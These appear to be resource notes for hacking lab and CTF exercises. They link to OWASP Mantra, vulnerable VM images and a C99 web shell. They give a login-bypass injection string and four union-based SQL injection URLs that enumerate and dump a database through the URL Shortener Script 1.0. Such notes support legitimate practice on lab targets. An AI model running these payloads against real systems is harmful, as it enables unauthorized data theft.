Who Wants to be a Millionaire

OWASP Mantra and Who Wants to be a Millionaire

OWASP Mantra - http://www.getmantra.com/
Who Wants to be a Millionaire - http://sourceforge.net/projects/vulfa
7-Zip - http://www.7-zip.org/
HTTP File Server - http://www.rejetto.com/hfs/

LAMP Security CTF 6

OWASP Mantra and LAMP Security CTF 6

OWASP Mantra - http://www.getmantra.com/
LAMP Security CTF 6 Image - http://sourceforge.net/projects/lampsecurity/files/latest/download
VMware Player - http://www.vmware.com/products/player/
7-Zip - http://www.7-zip.org/
SoftPerfect Network Scanner - http://www.softperfect.com/products/networkscanner/
C99 Shell - Google it. - http://lmgtfy.com/?q=c99+shell

Successful injection string - username=' OR 1=1 #&password=') OR 1=1 #

URL Shortener Script SQL Injection Vulnerability

OWASP Mantra - http://www.getmantra.com/

URL Shortener Script 1.0 SQL Injection Vulnerability - http://www.exploit-db.com/exploits/17937/

SQL Injection cheat sheets:
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ha.ckers.org/sqlinjection/

How to : Create a simple url shortener script is a few minutes

http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a-few-minuts/

Exploit-DB URL: http://www.exploit-db.com/exploits/17937/

Getting Databases: http://www.service.com/shortURL/show.php?id=1234.5union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--

Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--

Getting columns: http://www.service.com/shortURL/show.php?id=1234.5union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--

Getting Data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --